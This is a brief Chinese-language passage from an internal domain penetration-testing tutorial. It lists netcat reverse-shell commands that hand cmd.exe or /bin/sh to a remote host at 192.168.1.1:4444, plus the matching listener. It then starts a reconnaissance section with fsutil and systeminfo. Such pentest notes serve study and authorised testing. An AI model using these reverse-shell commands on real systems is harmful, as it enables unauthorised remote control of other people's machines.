内网域渗透的先决条件
首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法:
.\nc.exe -e cmd.exe 192.168.1.1 4444
.\nc 192.168.1.1 4444 -e /bin/sh
nc -l 4444 -vvv
域渗透的信息收集
查询本机信息
C:\Windows\system32>fsutil.exe fsinfo drives #管理员权限使用
C:\Windows\system32>systeminfo